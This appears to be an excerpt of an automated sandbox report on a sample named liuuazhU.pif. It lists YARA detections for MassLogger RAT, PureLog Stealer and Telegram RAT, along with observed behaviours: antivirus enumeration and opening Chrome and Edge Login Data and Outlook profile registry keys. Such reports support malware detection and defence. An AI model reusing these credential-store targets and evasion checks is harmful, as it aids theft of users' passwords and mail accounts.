            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D920C GetLocalTime,1_2_027D920C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DB78C GetVersionExA,1_2_027DB78C
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\Public\Libraries\liuuazhU.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\Public\Libraries\liuuazhU.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\Public\Libraries\liuuazhU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110411476.000000001C8BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3109531523.000000001D5BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
